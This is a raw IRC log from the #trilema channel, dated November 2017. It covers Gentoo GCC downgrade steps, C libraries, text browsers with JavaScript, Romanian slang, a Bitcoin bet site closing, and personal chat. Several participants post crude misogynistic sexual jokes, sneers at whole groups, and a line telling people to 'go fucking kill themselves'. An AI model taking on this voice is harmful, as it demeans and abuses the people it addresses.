time :) 1741083;1511159324;cazalla;BingoBoingo, safe travels 1741084;1511159769;BingoBoingo;Ah, welcome back 1741085;1511159792;BingoBoingo;What's your timeline to Poland looking like? 1741086;1511159829;cazalla;they drag their ass on paperwork so who knows on the citizenship part 1741087;1511159861;cazalla;the leaving part... i had downed almost a bottle of vodka, would like to buy a place there and take the kids with me but leaving them would be a bit much 1741088;1511159862;BingoBoingo;Ah, is it one that might be easier to get in country? 1741089;1511159937;cazalla;yeah, doing it from here, but they translate my documents and submit paperwork and apparently can take a while.. 3, 6, 12 months once all is said and done from start (kicked it off maybe 4 months ago getting dox) to finish 1741090;1511159977;BingoBoingo;One could always make more kids with the Polish girls. Just make sure to get at least three so the jealousy keeps each in line. 1741091;1511159988;cazalla;will be easier getting it for the kids, i'm thinking convince missus we go for 6 month holiday, then buy and just stay 1741092;1511160034;cazalla;really dont want to send them to school here :\ 1741093;1511160066;cazalla;no amount of money can fix some problems eh 1741094;1511160157;BingoBoingo;Ah 1741095;1511160248;cazalla;not that poland would be some paradise but step up from here, and i think kids would benefit from another language, young enough to pick up polish as first language instead of english 1741096;1511162330;BingoBoingo;Don't have to fixate on Poland though, could look to Romania and be the alfneighbor 1741097;1511163017;BingoBoingo;In other news, Charlie Manson Dead 1741098;1511163157;cazalla;lol pm from vexual, was outside watering the plants m80 1741099;1511163180;cazalla;BingoBoingo, who knows, time will tell i guess, not sure what else to do with myself besides this idea anyway 1741100;1511163210;cazalla;maybe learn to fly 1741101;1511163215;BingoBoingo;cazalla: Maybe start an ISP in Poland, keep backup plan in case tanks start rolling? 1741102;1511163245;cazalla;i imagine that would get struck down on account of it being a NATO state 1741103;1511163270;BingoBoingo;Maybe flip Poland over first? 1741104;1511163327;cazalla;what do you mean by flip 1741105;1511163393;BingoBoingo;face down ass up, you know.. how you win hearts and future ex-girlfriends 1741106;1511163427;cazalla;ah, def gonna go and spend some time there and surrounding countries 1741107;1511163462;cazalla;guess fly back and forth in attempt to be a dad without guilt lol 1741108;1511163554;BingoBoingo;brb sleepime. Gotta morning full of correspondence planned 1741109;1511163572;cazalla;ttyl 1741110;1511171810;mircea_popescu;http://btcbase.org/log/2017-11-20#1741043 << more of the same nonsense. whoever is involved in that should drop everything they're doing, quit their "job", give away their "devices", burn down their "books", tell all their "friends" to go fucking kill themselves and take a curator (see http://btcbase.org/log/2017-10-06#1721615 ) job for a year or so while eating nothing but tmsr logs. 1741111;1511171810;a111;Logged on 2017-11-20 03:32 zod_: what do y'all think of http://upspin.io/ ? 1741112;1511171810;a111;Logged on 2017-10-06 06:06 mircea_popescu: btw, is that the new "african american" pc term ? i seem to recall chapelle making a big deal out of wanting to be called a "custodian" in one of those hennifer-lopez level horrifyingly bad flicks he keeps churning out. 1741113;1511171890;mircea_popescu;it's not merely a shame that "such problems" are continuously "identified" by idiots, but that the scream for help universally goes unheeded. if you think ~about~ such things as upspin.io, i don't mean if you're "working" at them or anything like that, if you merely think ABOUT them you're certifiably SUTO. get the fuck out, completely, right now, it's a worse addiction than krakadil. parts of your body are falling off! 1741114;1511171952;mircea_popescu;if these kinds of non-items, memetic prions are anywhere in your mental space, you're suffering, from a disease. "if you're reading it, it's for you", and it's for you because you've already got a heavy load of misfolded protein. 1741115;1511172178;mircea_popescu;http://btcbase.org/log/2017-11-20#1741055 << if only that's how it worked. 1741116;1511172178;a111;Logged on 2017-11-20 03:41 shinohai: Take a handful, write entire Romanian dictionary by hand in 2 nights. 1741117;1511172228;mircea_popescu;http://btcbase.org/log/2017-11-20#1741065 << well at least market didn't "deflate". 1741118;1511172228;a111;Logged on 2017-11-20 03:46 pete_dushenski: http://btcbase.org/log/2017-10-25#1728845 << update on Madonna of the Yarnwinder auction... sold for ~only~ $450mn. 1741119;1511172467;mircea_popescu;(notes : desomorphine, item standing with heroin in about same relation tub-brewed methamphetamine stands with adderall) 1741120;1511172730;diana_coman;wtf that upspin; ftr the answers are no, no, no and NO, who has such "problems" anyway 1741121;1511173030;mircea_popescu;!#s "graduate student" 1741122;1511173031;a111;26 results for "\"graduate student\"", http://btcbase.org/log-search?q=%22graduate%20student%22 1741123;1511173051;mircea_popescu;idle over-ripe esl males, who. 1741124;1511173492;diana_coman;tbh it sounds more like teenage kids with too much pocket money or something 1741125;1511173504;diana_coman;but I suppose it's about the same thing by now anyway 1741126;1511173600;mircea_popescu;teenagers ? these are 30yos. 1741127;1511173610;mircea_popescu;the age of maturity keeps cheezing away 1741128;1511173622;diana_coman;myeah, that's my "same thing by now anyway" 1741129;1511173648;diana_coman;unrelated: asciilifeform's dic has this weird "a arunca buretele" but doesn't have "a caca steagul"!!!11 1741130;1511173710;mircea_popescu;wtf is the former ? 1741131;1511173765;diana_coman;I never heard it; dic says it's same as "a capitula"; possibly in a sponge-fight I'd gather 1741132;1511174500;mircea_popescu;oh, retroversion of "throw in the towel" 1741133;1511174509;mircea_popescu;pretty crappy sauce. 1741134;1511174628;diana_coman;then they should add tambour de livre too at least 1741135;1511174638;mircea_popescu;lol 1741136;1511174741;mircea_popescu;in related lulz, "Financial Struggles & Relationships, Journal Entry | 3 minutes ago : So I'm moving soon and am trying to scrape together enough money to pay for the move and for school fees so that I can get enrolled and back to classes. In order to do this, I basically have to sell all my gaming stuff since I don't qualify for any loans. The problem with that is that gaming is my life and pretty much my main form of stress 1741137;1511174741;mircea_popescu; relieve. So even the idea of having to sell everything is killing me inside and stressing me. This is unfortunately causing problems with my (sorta) girlfriend since I just can't bring myself to get into anything sexual while it's on my mind. I feel bad that I am letting my personal problems affect her, but I don't know how to get myself into a better situation." 1741138;1511174871;diana_coman;poor girlfriend 1741139;1511174923;mircea_popescu;i don't think she knows. 1741140;1511174985;diana_coman;ah, "sorta girlfriend", can be; onth I did stumble upon all sorts of reports from the other side: "my bf is all the time on his xbox, wut do" and so on 1741141;1511175179;mircea_popescu;https://ibb.co/iyW1oR << dood in question. 21yo ninja. 1741142;1511175215;mircea_popescu;diana_coman i think it's evident women are to blame! 1741143;1511175260;diana_coman;if that did at least something....; and ugh 1741144;1511175345;mircea_popescu;myeah. 1741145;1511175364;mircea_popescu;but, democracy, rite ? gotta provide housing, food, loose shoes and a warm hole to sploodge in for ALL THESE. 1741146;1511175404;mircea_popescu;maybe if he took teh red pill ? do you think wikireddit could help him ? if he were more... less... i mean... if he where the fuck's that gunwitch dood. 1741147;1511175439;diana_coman;the way it goes then is that "but they weren't supposed to be like THAT!" 1741148;1511175454;mircea_popescu;"Your initial state when seeing women you want is very important: the right one will cause you to approach them, the wrong one will panic and confuse you - preventing you from taking any action to ever meet them. If you do not meet them you almost certainly CANNOT have sex with them. Your internal state when you first see an attractive woman must be one of sexual enthusiasm, horniness, and unapologetic desire." 1741149;1511175469;mircea_popescu;imagine that mound of sexual enthusiasm coming at you. 1741150;1511175480;diana_coman;lol! 1741151;1511175490;mircea_popescu;it's all in the wrist, see. 1741152;1511175500;mircea_popescu;YOU CAN TRAIN THE AVERAGE MALE INTO SUCCESS! 1741153;1511175522;mircea_popescu;and it won't even need any work. not even much time. twenty pages. large script. three pages. a matchbox back! 1741154;1511175587;diana_coman;well, the eternal dream : it will be easy and fast and so on 1741155;1511175633;mircea_popescu;"how to make a name for yourself quickly" 1741156;1511175676;diana_coman;eh, I suspect nowadays you don't even need that; after all you've been named "adofdifjYYY" to be unique and so on to start with 1741157;1511175705;mircea_popescu;myeah. 1741158;1511176345;mircea_popescu;http://btcbase.org/log/2017-11-20#1741070 << quite exactly. 1741159;1511176345;a111;Logged on 2017-11-20 03:58 asciilifeform: 'rare art' is simply low-tech pre-bitcoin btc for lizards 1741160;1511176522;mircea_popescu;http://btcbase.org/log/2017-11-20#1741080 << the WHOLE POINT of usg.sv "tech" is to get around the "The Hettingas’ sense of ill-usage is understandable. So is their consternation at being confronted with the gap between the rhetoric of free markets and the reality of ubiquitous regulation. The Hettingas’ collision with the MREA—the latest iteration of the venerable AMAA—reveals an ugly truth: America’s cowboy capita 1741161;1511176522;a111;Logged on 2017-11-20 05:53 BingoBoingo: And in appcidental research into the market value of SUTO grad student labor: "Images of delivery take-home pay amounts posted to the Instacart shoppers’ Facebook group show recent instances where workers are sometimes making less than minimum wage for several hours of work. One woman showed $16.95 for seven hours of work in Jackson, Mississippi. Another said she was paid $13.30 for a three-hour job in St. Louis, Missouri. Yet anothe 1741162;1511176522;mircea_popescu;lism was long ago disarmed by a democratic process increasingly dominated by powerful groups with economic interests antithetical to competitors and consumers. And the courts, from which the victims of burdensome regulation sought protection, have been negotiating the terms of surrender since the 1930s." 1741163;1511176559;mircea_popescu;so whenever silicon valley is doing something other than circlejerking, is building ways for various "public protections" invented by dnc / usg.blue / tammany hall to NOT apply. 1741164;1511176575;mircea_popescu;they're the premier driver behind the "need to pack sardines tighter" "technologies". 1741165;1511177093;mircea_popescu;!!withdraw 0.004003 1AbRyEps74KejccooC9f5DiSgUSrui7Ycw 1741166;1511177097;deedbot;Get your OTP: http://p.bvulpes.com/pastes/ik0Gq/?raw=true 1741167;1511177153;mircea_popescu;this is getting fucking ridiculous, for the record. human sums (as defined by supermarket practice) totally unworth bothering with dust in bitcoin. 1741168;1511177480;mircea_popescu;and in ancient lulz... http://btcbase.org/log/2016-09-02#1533306 1741169;1511177480;a111;Logged on 2016-09-02 01:00 mircea_popescu: but anyway, lulzy "duel" of talking points from the libtards and really-not-libtards-promise. they all agree russia doesn't matter and that hillary will somehow win the "elections", but you're more than free to connect the rest of the dots any way you please ? hurr durr. 1741170;1511178718;mircea_popescu;i suppose by the time twice the supermarket price per item is hardly worth a bitcoin transacton, we might be well advised to revisit that "ancient" http://trilema.com/2015/ok-so-what-is-bitcoin-disrupting/ piece from two years ago. 1741171;1511179588;spyked;hi all. /me is catching up with discussions... 1741172;1511179596;mircea_popescu;hola. how goes ? 1741173;1511179665;spyked;not bad, mircea_popescu. still swamped, but slowly getting out. 1741174;1511179675;mircea_popescu;there's been a lot of that going around. 1741175;1511179828;spyked;#t has had a lot of interesting discussed! finally ate them up. 1741176;1511180352;spyked;http://btcbase.org/log/2017-11-14#1737923 <-- also, spyked's adalisp is missing more fundamental things, such as closures. it's an early prototype, barely usable, but > 0. interning is of course considered, but not added yet. anyway, phf, consider the following point: built-in symbols (car, cons, etc.) still have to point *somewhere*, and that somewhere must not be addressed in a C-machine style! symbols should point to Lisp memory (via 1741177;1511180352;a111;Logged on 2017-11-14 18:50 phf: http://btcbase.org/log/2017-11-14#1737529 << that doesn't sound right, read and eval are distinct phases, by the time you get to eval you shouldn't be operating with strings when but instead with interned symbols (i.e. things that can be eq'd in lisp and pointer equivalent on c machine level) 1741178;1511180358;spyked;safe array indexing), which brings asciilifeform's point re. bytecode further. in current item, builtins are hardcoded using strings, very not-elegant! 1741179;1511180503;spyked;http://btcbase.org/log/2017-11-14#1737956 <-- but lists are sequences too, and strings can be represented as lists. this becomes problematic when O(1) random accesses are needed. if/when that happens, I will have to implement arrays, but until then... strings are lists-of-characters. 1741180;1511180503;a111;Logged on 2017-11-14 19:03 jurov: a111: strings are sequences, not lists. cons/car/cdr does not apply, there's different set of functions for these 1741181;1511180590;spyked;http://btcbase.org/log/2017-11-14#1738140 <-- ftr, I am following phf's initial advice re. reading lisp in small pieces; this, along with kogge's book. but at snail's pace (code easier to write than read) 1741182;1511180590;a111;Logged on 2017-11-14 19:53 asciilifeform: phf: my understanding is that author was simply doing homework 1741183;1511180845;spyked;http://btcbase.org/log/2017-11-15#1738883 <-- pascal still in ro highschool curriculum afaik. ro school has much bigger problems, in the vein of http://trilema.com/2011/la-ce-imi-serveste-mie-radicalurile/ being asked not only by students, but by teachers themselves! (e.g. I once received q from teacher: "what's more important, physics or mathematics?" "both, bitch! and nao stop amputating those curricula!") 1741184;1511180845;a111;Logged on 2017-11-15 14:22 diana_coman: oh, ugh; and yes, now you mention it I think it was same-change in Ro too 1741185;1511180963;spyked;http://btcbase.org/log/2017-11-16#1739939 <-- neato! now digesting original paper (pdf: https://dspace.mit.edu/bitstream/handle/1721.1/6334/AIM-559.pdf ) 1741186;1511180963;a111;Logged on 2017-11-16 22:41 asciilifeform: !~later tell ben_vulpes https://github.com/threonorm/simulisp/blob/master/SCHEME-79/SCHEME-79%20Lisp%20on%20a%20chip.pdf << ( yes, pdf, it's an ancient scan, 1981 ) very spiffy review article by sussman re the famous scheme79 chip; also pertinent to anyone writing simple lisptrons of whatever kind 1741187;1511181215;spyked;http://btcbase.org/log/2017-11-18#1740268 <-- coincidentally, I've been working on a very similar thing this week-end. managed to get rid of gcc 5.4 through a variation on https://wiki.gentoo.org/wiki/Upgrading_GCC ; compressed steps: 1. install heathen stage3; 2. right after minimal setup (timezone, locale etc.), install gcc 4.9.4, and switch to it as default using gcc-config; 3. mask gcc >=5 in portage; 4. rebuild @system (and/or 1741188;1511181215;a111;Logged on 2017-11-18 06:55 ben_vulpes: likely has to do with that this box is running gcc 5.4.0, i think i have to figure out how to make a gentoo with gcc 4.9 1741189;1511181221;spyked;@world, though this is not needed in early install); 5. send gcc 5.4 into oblivion (should have no dependencies left by now). I can do a more detailed write-up if still needed. 1741190;1511181509;spyked;http://btcbase.org/log/2017-11-20#1740972 <-- aha! Romania had a linguist who tried to force phonetic en-ro translations, e.g. site->sait. his 'sait' is still online it seems: http://pruteanu.ro/0rapid/00index/00index-l.htm guy also had '90s (or was it early 2000s?) TV show on "correct romanian", was sometimes amusing. 1741191;1511181509;a111;Logged on 2017-11-20 01:23 asciilifeform: see in ru we dun have this problem , it gets fixed 'automagically', e.g. Марго 1741192;1511182094;spyked;http://btcbase.org/log/2017-11-20#1741023 <-- I didn't get from the discussion: are regionalisms, archaisms, etc. to be included in this dict, or are they separate item? example: belengher (plus expr. "a festeli belengherul", similar in meaning to "a caca steagul" mentioned earlier by diana_coman) 1741193;1511182094;a111;Logged on 2017-11-20 02:18 asciilifeform: back to the baseline item ( http://btcbase.org/log/2017-11-19#1740660 ) -- if mircea_popescu , diana_coman , spyked , ... ( who else we have ? ) would like to submit corrections/additions/subtractions -- plox to vpatch 1741194;1511182583;spyked;(belengher, of course, yet another euphemism for cock; a festeli: to stain, or rather, daub) 1741195;1511183070;spyked;(in other cockphemisms: carici, calabastoc; the latter, to my knowledge, does not exist in dictionaries, being entirely of rural origin) 1741196;1511183591;deedbot;mircea_popescu: http://p.bvulpes.com/pastes/86R2i/?raw=true 1741197;1511184010;trinque;morning all. 1741198;1511184337;mircea_popescu;win 1741199;1511185757;mircea_popescu;http://btcbase.org/log/2017-11-20#1741189 << can't hurt. got a blog or anything ? :D 1741200;1511185757;a111;Logged on 2017-11-20 12:33 spyked: @world, though this is not needed in early install); 5. send gcc 5.4 into oblivion (should have no dependencies left by now). I can do a more detailed write-up if still needed. 1741201;1511185786;mircea_popescu;it is ~extremely~ important to write these, much more so than can be evaluated at the present time. the value becomes evident mostly in retrospect. 1741202;1511186095;*;spyked adds this to list of write-ups. 1741203;1511186382;spyked;for the record, the steps described in http://btcbase.org/log/2017-11-20#1741187 work *today*. it will be increasingly harder to get a sane system once glib stops compiling with gcc 4.9, etc. an archaelogical approach would be to freeze the current state of the gentoo mirrors and build own stage1, stage2 etc. from scratch with known-working libc versions etc. 1741204;1511186382;a111;Logged on 2017-11-20 12:33 spyked: http://btcbase.org/log/2017-11-18#1740268 <-- coincidentally, I've been working on a very similar thing this week-end. managed to get rid of gcc 5.4 through a variation on https://wiki.gentoo.org/wiki/Upgrading_GCC ; compressed steps: 1. install heathen stage3; 2. right after minimal setup (timezone, locale etc.), install gcc 4.9.4, and switch to it as default using gcc-config; 3. mask gcc >=5 in portage; 4. rebuild @system (and/or 1741205;1511186423;shinohai;mornining trinque, mircea_popescu, everyone 1741206;1511186774;mircea_popescu;glib is slated to stop compiling ? 1741207;1511186791;mircea_popescu;but yes, gentoo freeze was discussed, vaguely, not seriously implemented. 1741208;1511186816;shinohai;http://btcbase.org/log/2017-11-20#1741203 <<< I would like to help ( I believe it was mod6 that mentioned it previously) set up some sort of mirror for just this purpose, because yes outside things will become unreliable sooner rather than later. 1741209;1511186816;a111;Logged on 2017-11-20 13:59 spyked: for the record, the steps described in http://btcbase.org/log/2017-11-20#1741187 work *today*. it will be increasingly harder to get a sane system once glib stops compiling with gcc 4.9, etc. an archaelogical approach would be to freeze the current state of the gentoo mirrors and build own stage1, stage2 etc. from scratch with known-working libc versions etc. 1741210;1511186878;mircea_popescu;go for it! 1741211;1511186891;shinohai;Current setup will build Eulora and trb like a dream, with nary a barf like I experienced in my old deb days 1741212;1511186899;mircea_popescu;gentoo ? 1741213;1511186928;spyked;hi shinohai 1741214;1511186930;shinohai;Yeah I switched 100% gentoo ~1 year ago, props to trinque for his patience with me. 1741215;1511186941;shinohai;hiya spyked how goes? 1741216;1511187078;shinohai;For me it was rather like building a model airplane, box of parts "Here, build this". Sometimes I wanted to just dump it all in the trash and just get high on the glue but persistence pays off I suppose. 1741217;1511187191;trinque;reminds me 1741218;1511187215;trinque;http://btcbase.org/log/2017-11-18#1740478 << I do. lemme dust it off and run, then I'll genesis it and put on my blog. 1741219;1511187215;a111;Logged on 2017-11-18 22:19 ben_vulpes: hey trinque do you still have that script for "infectious gentoo"? i might be able to get my old closet iron with 4.9 to build a respectable userland 1741220;1511187356;spyked;shinohai, pretty good. gentoo diddling. I'm trying to get a new box up, learn v, compile trb, add an ada in, learn lisp internals ... (the list continues) 1741221;1511187495;spyked;http://btcbase.org/log/2017-11-20#1741206 <-- at some point, glib folks will decide that gcc < 5 isn't "modern enough" to build glibc, so they'll break compatibility. will, in the (now) tradition of introducing arbitrary changes. 1741222;1511187495;a111;Logged on 2017-11-20 14:06 mircea_popescu: glib is slated to stop compiling ? 1741223;1511187546;trinque;eh why not use musl anyway 1741224;1511187570;mircea_popescu;o.O 1741225;1511187574;mircea_popescu;wtf is wrong with these idiots. 1741226;1511187718;spyked;trinque, ftr, I tried getting a uclibc system up, but it seems to lack e.g. localization support, which didn't get me very far. will have to give this another shot on the next box I get up (which might not even be an x86 box; or else, it will be a pcengines). 1741227;1511187841;spyked;speaking of which: http://archive.is/Vs1UC <-- "By 2020 [Intel] are said to be "removing legacy BIOS support from client and data center platforms." Based on the timing, it's then looking like for Intel Tiger Lake or Sapphire Rapids where they may cut off the legacy BIOS support." good riddance, eh? 1741228;1511187980;mircea_popescu;what is localizartion support ? 1741229;1511188027;spyked;fancier name for Unicode et alia 1741230;1511188032;shinohai;I think if one needs support for languages, etc? 1741231;1511188074;mircea_popescu;so not having such support saves you the trouble of having to cut it out later ? 1741232;1511188077;mircea_popescu;seems like a great deal. 1741233;1511188310;spyked;remaining problem is that it also needs to be cut out of software that relies on it. or eliminating such software altogether (this includes a large part of GUI software stack; did eulora go through the "needs locale" experience?). 1741234;1511188365;asciilifeform;http://btcbase.org/log/2017-11-20#1741226 << uclibc is lethally broken last i saw ( e.g. pthreads ) 1741235;1511188365;a111;Logged on 2017-11-20 14:21 spyked: trinque, ftr, I tried getting a uclibc system up, but it seems to lack e.g. localization support, which didn't get me very far. will have to give this another shot on the next box I get up (which might not even be an x86 box; or else, it will be a pcengines). 1741236;1511188407;asciilifeform;spyked: musl however worx great, trb stands on it. and iirc trinque has an entire musltronic gentoo. 1741237;1511188415;mircea_popescu;spyked what software do you use that relies on unicode and why do you. 1741238;1511188466;mircea_popescu;anyway, eulora client is specifically left as exercise to eulora player. can make it do anything you wish. 1741239;1511188510;spyked;asciilifeform, neato! 1741240;1511188734;asciilifeform;http://btcbase.org/log/2017-11-20#1741114 << from what i've seen so far, the prognosis for sufferers is quite grim 1741241;1511188734;a111;Logged on 2017-11-20 09:59 mircea_popescu: if these kinds of non-items, memetic prions are anywhere in your mental space, you're suffering, from a disease. "if you're reading it, it's for you", and it's for you because you've already got a heavy load of misfolded protein. 1741242;1511188750;mircea_popescu;yes well. 1741243;1511188756;asciilifeform;afaik 0 cures to date. 1741244;1511188772;spyked;mircea_popescu, problem isn't whether unicode is needed. but that "modern" software insists on shoving "support" down one's throat. it can be removed, of course (either support or software altogether), only I suspect the pile of unicode-enhanced crap yet hides some useful items. 1741245;1511188777;mircea_popescu;this is a dubious point. 1741246;1511188786;mircea_popescu;spyked be specific, list items. 1741247;1511188802;asciilifeform;http://btcbase.org/log/2017-11-20#1741119 << the occasional morphinist, in fact quits and becomes something resembling normal person. redditism, on other hand... 1741248;1511188802;a111;Logged on 2017-11-20 10:07 mircea_popescu: (notes : desomorphine, item standing with heroin in about same relation tub-brewed methamphetamine stands with adderall) 1741249;1511188816;mircea_popescu;my software consists of mostly bash, these days. what software ? 1741250;1511188853;mircea_popescu;asciilifeform i saw report recently : life expectancy of moscow heroin addict, 5-7 years. life expectancy of moscow homecooked-desomorphine addict, 18 months. 1741251;1511188869;spyked;mircea_popescu, js browser (e.g. firefox) that allows linking trilema snippets. the only reason I still keep one around. 1741252;1511188878;asciilifeform;mircea_popescu: krokodilists ? oh yea 1741253;1511188899;mircea_popescu;aha. 1741254;1511188907;mircea_popescu;spyked lynx ? 1741255;1511189026;mircea_popescu;(i mean links/elinks ; lynx might but my version is antique, doesn't) 1741256;1511189045;spyked;mircea_popescu, last time I tried (lynx, w3m, etc. even "links"), linking something such as http://trilema.com/2017/galati-yachting/#selection-23.0-25.14 didn't highlight 1741257;1511189067;spyked;(I use w3m for everything else) 1741258;1511189072;mircea_popescu;needs a special compile time flag and then a config diddle 1741259;1511189079;spyked;hm 1741260;1511189086;asciilifeform;http://btcbase.org/log/2017-11-20#1741187 << the correct solution is to not install the gcc5 nonsense to begin with, then won't need cleaning. but this won't be happening during isp winter 1741261;1511189086;a111;Logged on 2017-11-20 12:33 spyked: http://btcbase.org/log/2017-11-18#1740268 <-- coincidentally, I've been working on a very similar thing this week-end. managed to get rid of gcc 5.4 through a variation on https://wiki.gentoo.org/wiki/Upgrading_GCC ; compressed steps: 1. install heathen stage3; 2. right after minimal setup (timezone, locale etc.), install gcc 4.9.4, and switch to it as default using gcc-config; 3. mask gcc >=5 in portage; 4. rebuild @system (and/or 1741262;1511189094;mircea_popescu;i remember testing against it back when i put that thing in 1741263;1511189097;asciilifeform;( needs proper tmsr gentoo ) 1741264;1511189118;asciilifeform;hm i had nfi there is a lynx with js 1741265;1511189142;asciilifeform;seems like it'd defeat half the point of using lynx to begin with, neh 1741266;1511189154;mircea_popescu;linx not lynx, diff item. 1741267;1511189158;asciilifeform;hmm. 1741268;1511189196;*;asciilifeform aware of 'linx' but also had nfi that it had js. 1741269;1511189321;asciilifeform;in other noose, far away, 'Bitbet is shutting down as the admin team is no longer in a position to manage the site. All contracts that could be resolved have been resolved, and winnings have been paid out...' 1741270;1511189355;shinohai;awwwwwwwwwwww 1741271;1511189370;asciilifeform;corpse finally stopped twitching. 1741272;1511189407;shinohai;All profits have now been znorted up. 1741273;1511189498;asciilifeform;http://wotpaste.cascadianhacker.com/pastes/5xp1t/?raw=true << txt snapshot , as derp blocks archiver 1741274;1511189559;spyked;http://btcbase.org/log/2017-11-20#1741262 <-- I tried building a long time ago, but couldn't get it to do js. I'll give it a second shot. will also try to link js library against libc without unicode support (it seems links depends on libmozjs). /me adds another write-up to the list for when he gets this to work. 1741275;1511189559;a111;Logged on 2017-11-20 14:44 mircea_popescu: i remember testing against it back when i put that thing in 1741276;1511189618;mircea_popescu;spyked actually a limited js lib to replace libmozjs would kick ass. 1741277;1511189663;mircea_popescu;confiscate javascript from w3c by writing a subset from the pov of the republican lord, not from the pov of the bankrupt usg remoras trying to pretend like they're "online companies" "making money" 1741278;1511189666;asciilifeform;ftr you can't faithfully display teh l0gz without uniturd support, sadly ( between asciilifeform's ru, mircea_popescu's greek, various îțâșă-containing pasteolade ) 1741279;1511189791;mircea_popescu;why not ? phf';s logotron posts them correctly, as /x whatevers 1741280;1511189848;asciilifeform;pretty sure his ( and others ) give back the bytes that were put in ( which imho is correct behaviour ) 1741281;1511189946;asciilifeform;as for js, it is intrinsically, deeply and infectiously retarded, on a level that is difficult to compactly express -- e.g. http://btcbase.org/log/2016-08-10#1517759 is merely ~one~ aspect 1741282;1511189946;a111;Logged on 2016-08-10 16:37 phf: ben_vulpes: stock javascript doesn't have integers. 1741283;1511189975;mircea_popescu;asciilifeform implement a native string bignumatron. 1741284;1511190002;asciilifeform;it's what the pgp-in-js people did. ever try an' read the result ? 1741285;1511190008;asciilifeform;half a MB of gibberish 1741286;1511190236;mircea_popescu;you do it in c. 1741287;1511190244;mircea_popescu;not on top of js, but as part of tmsr-js 1741288;1511190267;asciilifeform;in what sense is the contemplated item 'js' then ? 1741289;1511190273;mircea_popescu;in the sense. 1741290;1511190295;mircea_popescu;implements some fraction of extant js functions, which we deem to be ALL of js, and some extras. 1741291;1511190297;asciilifeform;i mean, why retain the retarded syntax, and not cut straight to e.g. tmsr-scheme 1741292;1511190300;mircea_popescu;embrace and extinguish. 1741293;1511190314;mircea_popescu;ah, it'd have to live as wrapper on tmsr scheme would it 1741294;1511190414;shinohai;From @blockchain "We are experiencing an outage of our internal database. Your funds are safe. We've identified the issue and are working on a resolution. Stay updated at https://www.blockchain-status.com" 1741295;1511190424;shinohai;YOUR FUNDZ ARE SAFE!!!!111 1741296;1511190428;asciilifeform;nao if only js had ~merely~ retarded syntax. but also based on an intensely braindamaged oopism, that'd get carried into anything that 'embraces' 1741297;1511190467;mircea_popescu;oucj 1741298;1511190468;asciilifeform;i'ma let ben_vulpes , phf , others who served lengthy sentences of sisyphation in js , elaborate. 1741299;1511190510;mircea_popescu;asciilifeform i just want, from a strategic perspective, the tool whereby to be able to force a wedge among "website owners" and have them upgrade whether they want to or not, off the imperial tree. 1741300;1511190597;asciilifeform;from that pov it'd make even moar sense to have total break with html shitstack 1741301;1511190601;asciilifeform;incidentally, 1741302;1511190608;mircea_popescu;eventually. 1741303;1511190618;asciilifeform;!~later tell trinque didja ever get a chance to write down that hypertext system algo of yours ? 1741304;1511190618;jhvh1;asciilifeform: The operation succeeded. 1741305;1511190709;trinque;nope, have several improvements to the paybot (and cutting off the trb wallet) ahead of that 1741306;1511190757;asciilifeform;trinque: the dictionary thread immediately reminded me of it 1741307;1511190907;asciilifeform;consider how much more feasible a Troo Dictionary would be, on a hypertexttron that wasn't built by newjersey wreckers, with the idiot unidirectional links, each of which results in loading whole new file, and cannot meaningfully point to a section thereof, and the retarded anchors , and could go on for a week 1741308;1511190983;asciilifeform;in other lulz, http://groups.csail.mit.edu/mac/philg/research/shame-and-war.html << nao 404 1741309;1511190996;asciilifeform;not archived, either. 1741310;1511191047;asciilifeform;http://philip.greenspun.com/research/shame-and-war << apparently moved ( and possibly sectionally censored, i've nfi ) 1741311;1511191165;trinque;ah certainly. 1741312;1511191606;asciilifeform;http://btcbase.org/log/2017-11-20#1741227 << i.e. fughet about non-microshit os on intel 1741313;1511191606;a111;Logged on 2017-11-20 14:24 spyked: speaking of which: http://archive.is/Vs1UC <-- "By 2020 [Intel] are said to be "removing legacy BIOS support from client and data center platforms." Based on the timing, it's then looking like for Intel Tiger Lake or Sapphire Rapids where they may cut off the legacy BIOS support." good riddance, eh? 1741314;1511192137;mircea_popescu;"Since Travels with Samantha was getting 100,000 hits/day, the spillover from there into my research area was actually good for more exposure than my paper would have gotten from the conference proceedings." << way the fuck truer in 2017 than it was in 1994. 1741315;1511192158;mircea_popescu;whichever beobachter you choose can NOT drive enough traffic to make up a trilema minute. 1741316;1511192253;asciilifeform;the lulzy bit in 'shame and war' is that greenspun correctly identifies html as newjerseylade liquishit, but wholly misrepresents the focus of the braindamage ( he thinks it has something to do with lacking styling; and then 'hey they invented css, fixed it!' ) 1741317;1511192483;mircea_popescu;yeah, he's an uneven thinker. 1741318;1511194372;ben_vulpes;spyked: i'll give your recipe a whirl later 1741319;1511194627;ben_vulpes;in other lols, tesla failed to close the deal to supply uber with self-driving cars 1741320;1511194646;shinohai;http://btcbase.org/log/2017-11-20#1741274 <<< I forgot to mention spyked this did work for me when I tried it some time ago, had to ensure ECMAScript support was enabled after ./configure. 1741321;1511194646;a111;Logged on 2017-11-20 14:52 spyked: http://btcbase.org/log/2017-11-20#1741262 <-- I tried building a long time ago, but couldn't get it to do js. I'll give it a second shot. will also try to link js library against libc without unicode support (it seems links depends on libmozjs). /me adds another write-up to the list for when he gets this to work. 1741322;1511194667;ben_vulpes;usg dept of robocars cannot actually meet production quotas, chicken-buying-dollars will have to be spent with volvo of all corps 1741323;1511194819;ben_vulpes;also wtf, look at this inept shit: http://www.telegraph.co.uk/science/2017/11/20/sex-education-needs-graphic-teens-trying-taboo-practices-say/ "trying taboo practices", no link to original paper, what the hell am i even looking at 1741324;1511197341;shinohai;Jeez I almost don't want to have a news/rss feed open until this "I was raped" spam is over with. 1741325;1511197391;mircea_popescu;in other news, ended up in local church after walk this morning. had to leave once priest showed up and the womenz starting "singing" an hymn 1741326;1511197401;mircea_popescu;apparently they don't kick you out of church if you suck at singing. this is a problem. 1741327;1511197446;shinohai;btw, I rather liked the pics mircea_popescu posted of church in latest trilema. Nifty. 1741328;1511197491;mircea_popescu;different item, but yeah. 1741329;1511197561;shinohai;Just reminded me of it. Likely first Catholic church I have ever seen with a drop ceiling. 1741330;1511197879;mircea_popescu;for srs. 1741331;1511198529;asciilifeform;from same rag , moar brit lulz, https://archive.is/lmpYM >> 'Guy Hedger was killed at around 3am on April 30 after intruders entered his £1 million home in Castlewood, Ashley, near Ringwood, Hampshire' 1741332;1511198589;asciilifeform;'...demanded that Mr Hedger tell him the combination for two safes... men made off with more than £120,000 worth of jewellery watches and valuables' then shot , etc. 1741333;1511199403;mircea_popescu;evidently hedger didn't EARN that money. 1741334;1511199628;spyked;re. links/elinks js, mircea_popescu, shinohai, thanks for the pointers. attempts so far to get a working item failed, but it's worth reporting what I've found. long story short, elinks depends on libmozjs, 